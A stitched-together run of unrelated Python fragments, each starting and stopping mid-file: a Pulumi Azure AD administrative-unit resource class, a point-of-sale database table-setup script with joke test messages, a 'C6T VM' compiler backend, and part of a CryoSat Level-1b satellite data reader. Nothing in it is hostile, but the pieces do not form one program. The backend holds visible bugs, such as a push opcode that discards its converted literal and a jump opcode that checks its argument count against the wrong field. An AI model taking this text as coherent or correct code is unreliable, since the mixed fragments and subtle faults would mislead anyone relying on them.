:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing administrative unit is found with the same name
"""
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if hidden_membership_enabled is not None:
pulumi.set(__self__, "hidden_membership_enabled", hidden_membership_enabled)
if members is not None:
pulumi.set(__self__, "members", members)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if prevent_duplicate_names is not None:
pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the administrative unit.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The display name of the administrative unit.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="hiddenMembershipEnabled")
def hidden_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the administrative unit and its members are hidden or publicly viewable in the directory
"""
return pulumi.get(self, "hidden_membership_enabled")
@hidden_membership_enabled.setter
def hidden_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "hidden_membership_enabled", value)
@property
@pulumi.getter
def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The object ID of the administrative unit.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, will return an error if an existing administrative unit is found with the same name
"""
return pulumi.get(self, "prevent_duplicate_names")
@prevent_duplicate_names.setter
def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_duplicate_names", value)
class AdministrativeUnit(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Manages an Administrative Unit within Azure Active Directory.
## API Permissions
The following API permissions are required in order to use this resource.
When authenticated with a service principal, this resource requires one of the following application roles: `AdministrativeUnit.ReadWrite.All` or `Directory.ReadWrite.All`
When authenticated with a user principal, this resource requires one of the following directory roles: `Privileged Role Administrator` or `Global Administrator`
## Import
Administrative units can be imported using their object ID, e.g.
```sh
$ pulumi import azuread:index/administrativeUnit:AdministrativeUnit example 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the administrative unit.
:param pulumi.Input[str] display_name: The display name of the administrative unit.
:param pulumi.Input[bool] hidden_membership_enabled: Whether the administrative unit and its members are hidden or publicly viewable in the directory
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing administrative unit is found with the same name
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AdministrativeUnitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Administrative Unit within Azure Active Directory.
## API Permissions
The following API permissions are required in order to use this resource.
When authenticated with a service principal, this resource requires one of the following application roles: `AdministrativeUnit.ReadWrite.All` or `Directory.ReadWrite.All`
When authenticated with a user principal, this resource requires one of the following directory roles: `Privileged Role Administrator` or `Global Administrator`
## Import
Administrative units can be imported using their object ID, e.g.
```sh
$ pulumi import azuread:index/administrativeUnit:AdministrativeUnit example 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param AdministrativeUnitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AdministrativeUnitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AdministrativeUnitArgs.__new__(AdministrativeUnitArgs)
__props__.__dict__["description"] = description
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["hidden_membership_enabled"] = hidden_membership_enabled
__props__.__dict__["members"] = members
__props__.__dict__["prevent_duplicate_names"] = prevent_duplicate_names
__props__.__dict__["object_id"] = None
super(AdministrativeUnit, __self__).__init__(
'azuread:index/administrativeUnit:AdministrativeUnit',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
object_id: Optional[pulumi.Input[str]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None) -> 'AdministrativeUnit':
"""
Get an existing AdministrativeUnit resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param | |
'''upc text primary key,
num_of_vendors integer default 0,
department text,
category text,
subcategory text,
location text,
material text,
postacct text,
unit_type text,
item_type text,
agepopup integer default 0,
posoptions text,
consignment integer default 0,
unitsinpackage integer default 1,
foodstampexempt integer default 0,
loyaltyexempt integer default 0,
deactivated integer default 0,
aisle_num text,
extra_places text,
section_num text,
closeout integer default 0'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc', "'TESTITEM'")
# POSoptions via JSON
# Prompt for Quantity = Y/N
# Assume 1 Sold = Y/N
# Prompt for Price, Quantity Calculated = Y/N
# Prompt for scale = Y/N
# Item Pricing Schemes table
table_name = 'item_pricing_schemes'
cols_list = '''name text primary key,
scheme_list text,
reduce_by text default "3"'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('name, scheme_list, reduce_by', "'1-3-10','1-3-10', '2.50'")
# Item Vendor Data
table_name = 'item_vendor_data'
cols_list = '''upc text primary key,
vendor1_num text,
vendor2_num text,
vendor3_num text,
vendor4_num text,
vendor5_num text,
vendor6_num text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
# JSON in each field
#
# - ordernum
# - prev_ordernum
# - lead_time
# - minimum_order
# - last_order
# - last_order_date
# - last_rec
# - last_rec_date
# - outstanding
# - units_in_order
## Item Notes
table_name = 'item_notes'
cols_list = '''upc text primary key,
notes text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc, notes', "'TESTITEM','This here is a note for the Test Item'")
# Item POS Sales Links
table_name = 'item_sales_links'
cols_list = '''upc text primary key,
sales_links text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc', "'TESTITEM'")
#JSON
# - item(#) large number of sales links associated with item
# - message
# Item Customer Instructions
table_name = 'item_cust_instructions'
cols_list = '''upc text primary key,
print_info_options integer default 0,
print_return_options integer default 0,
print_warranty_options integer default 0,
info_dialog text,
return_dialog text,
warranty_dialog text,
info_box, text,
return_box text,
warranty_box text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
info_message = 'Hello there, I see you bought the TestItem, Good Luck with that'
return_message = "Dont even think of returning this now that ive managed to get rid of it"
warranty_message = "There isnt one, even if there was, i certainly wouldnt tell you about it"
a.CreateTestItem('upc, info_box, return_box, warranty_box', f"'TESTITEM','{info_message}', '{return_message}', '{warranty_message}'")
# Item History
table_name = 'item_history'
cols_list = '''upc text primary key,
year integer,
january real,
february real,
march real,
april real,
may real,
june real,
july real,
august real,
september real,
october real,
november real,
december real'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc, year, january', "'TESTITEM', 2021, 1.5")
############# Transaction Related Tables #####################
sql_file = '../db/TRANSACTIONS.sql'
# Transaction Ctrl Number
table_name = 'transaction_control'
cols_list = '''abuser text primary key,
trans_num integer'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('abuser, trans_num', "'rhp', 0")
# Transactions
table_name = 'transactions'
cols_list = '''transaction_id text,
date text,
salesperson integer,
time text,
cust_num text,
address_acct_num text,
upc text,
description text,
qty real,
avg_cost real,
unit_price real,
total_price real,
pricetree text,
discount text,
type_of_transaction text,
tax1 integer default 0,
tax2 integer default 0,
tax3 integer default 0,
tax4 integer default 0,
tax_never integer default 0,
tax_exempt integer default 0,
po_number text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
fieldnames = '''transaction_id, date, salesperson, time, cust_num, address_acct_num,
upc, description, qty, avg_cost, unit_price, total_price, pricetree, discount, type_of_transaction,
tax1, tax2, tax3, tax4, tax_never, tax_exempt, po_number'''
values = """'0', '20201016', '1', '10:10:00', '37047734', '',
'BEEFSTICK', 'Jack Links BeefStick',3, 0.65, 0.99, 2.97,'',0, 'SALE',
1, 1, 1, 1, 1, 1, 'Test PO'"""
a.CreateTestItem(fieldnames, values)
#Transaction Payments
table_name = 'transaction_payments'
cols_list = '''transaction_id text primary key,
paid real default 0.00,
discount_taken real default 0.00,
subtotal_price real default 0.00,
tax real default 0.00,
total_price real default 0.00,
paid_date text,
date text,
time text,
cust_num text,
address_acct_num text,
pay_method text,
change_back text,
type_of_transaction text,
cash_payment real,
check_payment real,
check_num text,
dl_number text,
phone_num text,
dob text,
charge real default 0.00,
card1_payment real default 0.00,
auth1_num text,
card1_type text,
card1_numbers text,
card2_payment real default 0.00,
auth2_num text,
card2_type text,
card2_numbers text,
card3_payment real default 0.00,
auth3_num text,
card3_type text,
card3_numbers text,
card4_payment real default 0.00,
auth4_num text,
card4_type text,
card4_numbers text,
card5_payment real default 0.00,
auth5_num text,
card5_type text,
card5_numbers text,
debit_payment real default 0.00,
auth6_num text,
debit_type text,
debit_numbers text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
#Transaction Notes
table_name = 'transaction_notes'
cols_list = '''station_num integer,
transaction_id text,
line_position text,
note text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
############## General Operations Related Tables ##############
sql_file = '../db/CONFIG.sql'
# Store info
table_name = 'basic_store_info'
cols_list = '''store_num integer primary key,
name text,
address1 text,
address2 text,
city text,
state text,
zip text,
phone1 text,
phone2 text,
fax text,
email text,
print_on_forms integer default 0,
late_charge real,
cust_id_title text,
penny_tally real,
website text,
logo text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem("store_num, name, address1, city, state, zip","0,'ABC Hardware','111 Hill St','Ipsum City','OH','45632'")
# POS Controls
table_name = 'pos_controls'
cols_list = '''store_num text primary key,
print_receipt_ondemand integer default 0,
prompt_for_qty integer default 0,
add_cust integer default 1,
add_items integer default 1,
payment_on_acct integer default 0,
verify_assigned_discounts integer default 0,
report_out_of_stock integer default 0,
print_signature_line integer default 1,
print_item_count integer default 1,
track_salesperson integer default 0,
mailing_list_capture integer default 0,
omit_discount_price integer default 0,
disable_open_drawer integer default 1,
omit_you_saved_line integer default 0,
no_alt_tax integer default 1,
notify_if_cost_gt_price integer default 1,
offer_on_hold_options integer default 1,
exclude_quotes integer default 0,
print_void_transactions integer default 0,
print_totals_on_logoff integer default 1,
prompt_for_cost integer default 0,
print_item_number integer default 0
'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num',"0")
# a = TableAware(table_name, sql_file, dbtype='sqlite3')
# a.AddField('print_receipt_ondemand', integer=11, defaults=0)
# a.AddField('prompt_for_qty', integer=11, defaults=0)
# a.AddField('add_cust', integer=11, defaults=0)
# a.AddField('add_items', integer=11, defaults=0)
# a.AddField('payment_on_acct', integer=11, defaults=0)
# a.AddField('verify_assigned_discounts', integer=11, defaults=0)
# a.AddField('report_out_of_stock', integer=11, defaults=0)
# a.AddField('disable_credit_security', integer=11, defaults=0)
# a.AddField('print_signature_line', integer=11, defaults=0)
# a.AddField('skip_finished_question', integer=11, defaults=0)
# a.AddField('print_item_count', integer=11, defaults=0)
# a.AddField('track_salesperson', integer=11, defaults=0)
# a.AddField('mailing_list_capture', integer=11, defaults=0)
# a.AddField('disable_open_drawer', integer=11, defaults=0)
# a.AddField('dept_totals_by_drawer', integer=11, defaults=0)
# a.AddField('omit_cust_addr', integer=11, defaults=0)
# a.AddField('print_totals_on_logoff', integer=11, defaults=0)
# a.AddField('save_cleared_totals_to_reconcile', integer=11, defaults=0)
# a.AddField('verify_parts_explosion', integer=11, defaults=0)
# a.AddField('display_parts_explosion', integer=11, defaults=0)
# a.AddField('print_kit_parts', integer=11, defaults=0)
# a.AddField('print_kit_parts_price', integer=11, defaults=0)
# a.AddField('discount_omit_price', integer=11, defaults=0)
# a.AddField('trap_zips', integer=11, defaults=0)
# a.AddField('prompt_for_cost', integer=11, defaults=0)
# a.AddField('print_item_num', integer=11, defaults=0)
# a.AddField('support_eos_discount', integer=11, defaults=0)
# a.AddField('no_alt_tax', integer=11, defaults=0)
# a.AddField('notify_if_cost_gt_price', integer=11, defaults=0)
# a.AddField('omit_you_saved_line', integer=11, defaults=0)
# a.AddField('offer_on_hold_options', integer=11, defaults=0)
# a.AddField('print_void_trans', integer=11, defaults=0)
# a.AddField('exclude_layaways', integer=11, defaults=0)
# a.AddField('exclude_orders', integer=11, defaults=0)
# a.AddField('exclude_quotes', integer=11, defaults=0)
# a.AddField('exclude_hold', integer=11, defaults=0)
# POS Messages
table_name = 'pos_messages'
cols_list = '''abuser text primary key,
conditions text,
return_policy text,
warranty text,
charge_agreement text,
credit_card_agreement text,
thanks text,
check_policy text,
layaway_policy text,
gift_loyalty text,
special_event text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
return_policy='30 Day Return, Package unopened, item unused'
charge_agree='You agree to pay in full every month before the 30th'
cc_agree='The way of the future, Hooray for a cashless society'
thanks='Thank you for your business'
check_policy='Nope, no thanks, never, NO CHECKS!!!!'
a.CreateTestItem('abuser, return_policy, charge_agreement, credit_card_agreement, thanks, check_policy', f"'rhp','{return_policy}','{charge_agree}','{cc_agree}','{thanks}','{check_policy}'")
# Store Closing Options
table_name = 'store_closing_options'
cols_list = '''store_num integer,
combined_trans_detail integer default 0,
trans_by_pay_type integer default 0,
trans_by_salesperson integer default 0,
trans_by_drawer integer default 1,
tax_audit_report integer default 0,
item_sales_by_deptcat integer default 0,
deptcat_option integer default 0,
exit_after_closing integer default 0,
do_not_print_hardcopy integer default 0'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num','0')
table_name = 'reports_closing_daily'
cols_list = '''store_num integer primary key,
all_transactions integer default 1,
cash_drawer_totals integer default 1,
customer_invoiced integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_weekly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top10 integer default 1,
inventory_loser10 integer default 1,
inventory_most_requested integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_monthly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top50 integer default 1,
inventory_losers50 integer default 1,
inventory_most_requested integer default 1,
tax_report integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_quarterly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top100 integer default 1,
inventory_losers100 integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_yearly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top250 integer default 1,
inventory_losers250 integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
## Payment Methods
table_name = 'payment_methods'
cols_list = '''store_num integer primary key,
cash integer default 1,
checks integer default 1,
charge integer default 0,
credit_card integer default 1,
debit_card integer default 1,
food_stamps integer default 0,
foreign_stamps integer default 0,
loyalty_card integer default 0
'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'tax_tables'
cols_list = '''tax_name text primary key,
GLsub integer default 000,
RNDscheme integer default 0,
APscheme integer default 0,
no_pennies_rounding integer default 0,
min_sale real default 0.00,
max_sale real default 0.00,
item_max real default 0.00,
from_amt0 real default 0.00,
tax_rate0 real default 0.00000,
from_amt1 real default 0.00,
tax_rate1 real default 0.00000,
from_amt2 real | |
<filename>backend/backend.py
"""C6T VM codegen backend.
"""
import re
import collections.abc
from string import whitespace
from collections import deque
from ctypes import Union
from typing import Callable, Dict, Deque, Optional, Tuple, overload, Iterator, Iterable, Any, List
class ValType:
"""Base class for a int,float,char,or double.
"""
class IntType(ValType):
pass
class CharType(ValType):
pass
class FltType(ValType):
pass
class DblType(ValType):
pass
class Flags(collections.abc.MutableMapping):
"""A collection of flags, which default to a given value.
"""
def __init__(self, default: bool, **kwargs) -> None:
super().__init__()
if not isinstance(default, bool):
raise TypeError("default value must be a bool")
self.default = default
self.flags = {}
for name in kwargs:
self[name] = True
def __delitem__(self, __v: str) -> None:
del self.flags[__v]
def __getitem__(self, __k: str) -> bool:
if __k in self.flags:
return self.flags[__k]
return self.default
def __setitem__(self, __k: str, __v: bool) -> None:
if not isinstance(__v, bool):
raise TypeError("Flag values must be bools")
self.flags[__k] = __v
def __iter__(self) -> Iterator[str]:
for name in self.flags:
yield name
def __len__(self) -> int:
return len(self.flags)
def __getattr__(self, name: str) -> bool:
return self.flags[name]
def __setattr__(self, __name: str, __value: Any) -> None:
if __name in self.__dict__:
super().__setattr__(__name, __value)
self[__name] = __value
class Opcode:
"""A C6T opcode representation, with information on its properties.
"""
def __init__(self, code: str, stk_args: int = None, inline_args: int = None, **flags) -> None:
if stk_args is None:
stk_args = 0
if inline_args is None:
inline_args = 0
self.code = code
self.stk_args = stk_args
self.inline_args = inline_args
self.flags = Flags(False, **flags)
def build(self, stack: Deque, inline_args: Optional[list] = None):
"""Create the representation of the opcode.
"""
return None
class Leaf:
"""Base class for a C6T leaf value (constant or memory cell).
"""
class FramePointer(Leaf):
"""Representation of the frame pointer.
"""
def __str__(self) -> str:
return "fp"
class MemoryCell(Leaf):
"""Base class for C6T memory cells.
"""
class Register(MemoryCell):
"""The value at the given register number.
"""
def __init__(self, regnum: int) -> None:
super().__init__()
self.regnum = regnum
def __str__(self) -> str:
return f"reg{self.regnum}"
class Static(MemoryCell):
"""A static C6T memory cell.
"""
def __init__(self, name: str):
self.name = name
def __str__(self) -> str:
return self.name
class Con(Leaf):
"""A C6T integer constant.
"""
def __init__(self, value: int):
self.value = value
def __str__(self) -> str:
return str(self.value)
class Temp(MemoryCell):
"""A C6T temporary memory cell.
"""
cur_index = 0
def __init__(self):
self.index = self.__class__.cur_index
self.__class__.cur_index += 1
def reset(self):
"""Reset the index of all temporaries.
"""
self.__class__.cur_index = 0
class Node:
"""A C6T stack node.
Raises:
ValueError: Not enough inline arguments for the opcode
ValueError: Not enough stack arguments for the opcode
"""
@overload
def __init__(self, opcode: Opcode, *children, args: Optional[list] = None) -> None:
if args is None:
args = []
self.opcode = opcode
self.children = list(children)
self.args = args
self.regnum = None # type:Union[None, int]
def __init__(self, opcode: Opcode, stack: deque, args: Optional[deque] = None) -> None:
if args is None:
args = []
self.opcode = opcode
self.children = []
if len(args) != opcode.inline_args:
raise ValueError(
f"Not enough inline arguments (need {opcode.inline_args}, have {len(args)})")
self.args = args
if len(stack) < opcode.stk_args:
raise ValueError(
f"Not enough stack arguments (need {opcode.stk_args}, have {len(stack)})")
for i in range(opcode.stk_args):
self.children.insert(0, stack.pop())
self.regnum = None # type:Union[None, int]
class Statement:
"""A C6T VM statement node.
"""
def __init__(self, statecode: str):
self.statecode = statecode
class Move(Statement):
"""Statement to compute an expression and store its value.
"""
def __init__(self, dest: Union[Leaf, Node], expr: Union[Node, Leaf], dest_type: ValType):
super().__init__('move')
self.dest = dest
self.expr = expr
self.dest_type = dest_type
class Eval(Statement):
"""Compute an expression and ignore the result.
"""
def __init__(self, expr: Union[Node, Leaf]):
super().__init__('eval')
self.expr = expr
class Jump(Statement):
"""Jump unconditionall to an address.
"""
def __init__(self, target: Union[Node, Leaf]):
super().__init__('jump')
self.target = target
class Brz(Statement):
"""Compute an expression and jump to the address if the expression is 0.
"""
def __init__(self, expr: Union[Node, Leaf], target: Leaf):
super().__init__('brz')
self.expr = expr
self.target = target
class Label(Statement):
"""Define a label here.
"""
def __init__(self, name: str):
super().__init__('label')
self.name = name
class SeqState(Statement):
"""Perform multiple statements in order.
"""
def __init__(self, *statements: Statement):
super().__init__('seq')
self.statements = list(statements)
def __iter__(self):
for statement in self.statements:
if isinstance(statement, SeqState):
for substate in statement:
yield substate
else:
yield statement
def __len__(self):
return len(list(self))
def leaders(self) -> Iterable[int]:
"""Returns iterable of the indexes of all statements.
"""
next_is_leader = False
for index, statement in list(self):
leader = None
if next_is_leader:
leader = index
if index == 0:
leader = index
if isinstance(statement, (Brz, Jump)):
next_is_leader = True
if isinstance(statement, Label):
leader = index
else:
next_is_leader = False
if leader is not None:
yield leader
def basic_blocks(self) -> Iterable[List[Statement]]:
"""Iterator over all basic blocks.
"""
statements = list(self)
leaders = list(self.leaders())
while len(leaders) > 2:
leader = leaders.pop(0)
tail = leaders[0]
yield statements[leader:tail]
if len(leaders) > 1:
yield statements[leaders[0]:]
class StkOp(Opcode):
"""A opcode which performs stack operations.
"""
def build(self, stack: deque, inline_args: Optional[list] = None) -> None:
"""Create an expression node from this opcode."""
if inline_args is None:
inline_args = []
stack.append(Node(self, stack, inline_args))
return None
class LexName:
"""A lexical token.
"""
def __init__(self, name: str) -> None:
self.name = name
class PushOp(Opcode):
"""Opcode to push a literal value.
"""
def __init__(self) -> None:
super().__init__('push', 0, 1)
def build(self, stack: Deque, inline_args: Optional[list] = None):
if len(inline_args) != self.inline_args:
raise ValueError("Not enough inline args")
literal = inline_args[0]
if isinstance(literal, LexName):
literal = Static(literal.name)
stack.append(inline_args[0])
return None
add_op = StkOp('add', 2)
sub_op = StkOp('sub', 2)
class PushframeOp(Opcode):
"""Opcode to push an address relative to the frame pointer.
"""
def __init__(self) -> None:
super().__init__('pushframe', 0, 1)
def build(self, stack: Deque, inline_args: Optional[list] = None):
if len(inline_args) != self.inline_args:
raise ValueError("Not enough inline args")
stack.append(FramePointer())
stack.append(inline_args[0])
return add_op.build(stack)
class JmpOp(Opcode):
"""Opcode for a jump instruction.
"""
def __init__(self) -> None:
super().__init__('jmp', 0, 1)
def build(self, stack: Deque, inline_args: Optional[list] = None) -> Jump:
if len(inline_args) != self.stk_args:
raise ValueError("Not enough inline arguments.")
return Jump(Static(inline_args[0]))
class MoveOp(Opcode):
"""Opcode for storing in a target location.
"""
def __init__(self, code: str, dest_type: ValType) -> None:
super().__init__(code, 2, 0)
self.dest_type = dest_type
def build(self, stack: Deque, inline_args: Optional[list] = None) -> Move:
if len(stack) < self.stk_args:
raise ValueError("Not enough stack arguments")
dest = stack.pop()
expr = stack.pop()
return Move(dest, expr, self.dest_type)
class BrzOp(Opcode):
"""Opcode for branching conditionally.
"""
def __init__(self) -> None:
super().__init__('brz', 1, 1)
def build(self, stack: Deque, inline_args: Optional[list] = None) -> Brz:
if len(stack) < self.stk_args:
raise ValueError("Not enough stack args")
if len(inline_args) != self.inline_args:
raise ValueError("Not enough inline args")
return Brz(stack.popleft(), Static(inline_args[0]))
class StkJmp(Opcode):
"""Opcode for jumping to a stack evaluating location.
"""
def __init__(self) -> None:
super().__init__('stkjmp', 1, 0)
def build(self, stack: Deque, inline_args: Optional[list] = None) -> Jump:
if len(stack) < self.stk_args:
raise ValueError("Not enough stack args")
return Jump(stack.pop())
class ClearOp(Opcode):
"""Opcode for a stack clear instruction.
"""
def __init__(self) -> None:
super().__init__('clear', 0, 0)
def build(self, stack: Deque, inline_args: Optional[list] = None):
stack.clear()
return None
def for_effect(node: Union[Leaf, Node]) -> list[Union[Leaf, Node]]:
"""Recursively computes those Nodes and Leafs which need to be computed
for effect only.
"""
if isinstance(node, Node):
if node.opcode.flags.has_effect:
return [node]
children = []
for child in node.children:
children += for_effect(child)
return children
return []
RE_ALPHA = r"([a-zA-Z_.])"
RE_NUM = r"(\d)"
RE_ALPHANUM = r"(("+RE_ALPHA+r")|("+RE_NUM+r"))"
RE_LABEL = r"(?P<label>"+RE_ALPHA+RE_ALPHANUM+r"*)"
RE_NAME = r"(?P<name>"+RE_ALPHA+RE_ALPHANUM+r"*)"
RE_CON = r"(?P<con>"+RE_NUM+r")"
class Grabber:
"""Allows text to be grabbed.
"""
def __init__(self, text: str):
self.text = text
self.__index = 0
def __iter__(self) -> Iterator[str]:
return self
def bounds(self) -> None:
"""Makes sure our index >= 0.
"""
self.__index = max(0, self.__index)
def grab(self, count: int = 1) -> str:
"""Return the next count characters from me.
"""
old_index = self.__index
self.__index += count
return self.text[old_index:old_index+count]
def __next__(self) -> str:
return self.grab(1)
def match(self, pattern: str) -> Union[str, None]:
"""Try to match against a given regular expression.
"""
match = re.match(pattern, self.text[self.__index:])
if match is None:
return None
self.seek(len(match[0]))
return match[0]
def match_any(self, *args: Tuple[str, str]) -> Union[Tuple[str, str], None]:
"""Try to match, in order, the given arguments. Returns the one
matched, or None of none matched. Ends on the first match.
"""
for name, pattern in args:
match = self.match(pattern)
if match is not None:
return | |
variables
if isinstance(val, dict):
# for each waveform beam variable
for k,v in val.items():
# scale variable
CS_L1b_mds[group][key][k] = CS_l1b_scale[group][key][k]*v.copy()
else:
# scale variable
CS_L1b_mds[group][key] = CS_l1b_scale[group][key]*val.copy()
# calculate GPS time of CryoSat data (seconds since Jan 6, 1980 00:00:00)
# from TAI time since Jan 1, 2000 00:00:00
GPS_Time = self.calc_GPS_time(CS_L1b_mds['Location']['Day'],
CS_L1b_mds['Location']['Second'], CS_L1b_mds['Location']['Micsec'])
# leap seconds for converting from GPS time to UTC time
leap_seconds = self.count_leap_seconds(GPS_Time)
# calculate dates as J2000 days (UTC)
CS_L1b_mds['Location']['days_J2k'] = (GPS_Time - leap_seconds)/86400.0 - 7300.0
# parameters to extract
if field_dict is None:
field_dict = self.__default_field_dict__()
# extract fields of interest using field dict keys
for group,variables in field_dict.items():
for field in variables:
if field not in self.fields:
self.fields.append(field)
setattr(self, field, CS_L1b_mds[group][field])
# update size and shape of input data
self.__update_size_and_shape__()
# return the data and header text
return self
def from_nc(self, full_filename, field_dict=None, unpack=False, verbose=False):
"""
Read CryoSat Level-1b data from netCDF4 format data
"""
# file basename and file extension of input file
fileBasename,fileExtension=os.path.splitext(os.path.basename(full_filename))
# CryoSat file class
# OFFL (Off Line Processing/Systematic)
# NRT_ (Near Real Time)
# RPRO (ReProcessing)
# TEST (Testing)
# TIxx (Stand alone IPF1 testing)
# LTA_ (Long Term Archive)
regex_class = 'OFFL|NRT_|RPRO|TEST|TIxx|LTA_'
# CryoSat mission products
# SIR1SAR_FR: Level 1 FBR SAR Mode (Rx1 Channel)
# SIR2SAR_FR: Level 1 FBR SAR Mode (Rx2 Channel)
# SIR_SIN_FR: Level 1 FBR SARin Mode
# SIR_LRM_1B: Level-1 Product Low Rate Mode
# SIR_FDM_1B: Level-1 Product Fast Delivery Marine Mode
# SIR_SAR_1B: Level-1 SAR Mode
# SIR_SIN_1B: Level-1 SARin Mode
# SIR1LRC11B: Level-1 CAL1 Low Rate Mode (Rx1 Channel)
# SIR2LRC11B: Level-1 CAL1 Low Rate Mode (Rx2 Channel)
# SIR1SAC11B: Level-1 CAL1 SAR Mode (Rx1 Channel)
# SIR2SAC11B: Level-1 CAL1 SAR Mode (Rx2 Channel)
# SIR_SIC11B: Level-1 CAL1 SARin Mode
# SIR_SICC1B: Level-1 CAL1 SARIN Exotic Data
# SIR1SAC21B: Level-1 CAL2 SAR Mode (Rx1 Channel)
# SIR2SAC21B: Level-1 CAL2 SAR Mode (Rx2 Channel)
# SIR1SIC21B: Level-1 CAL2 SARin Mode (Rx1 Channel)
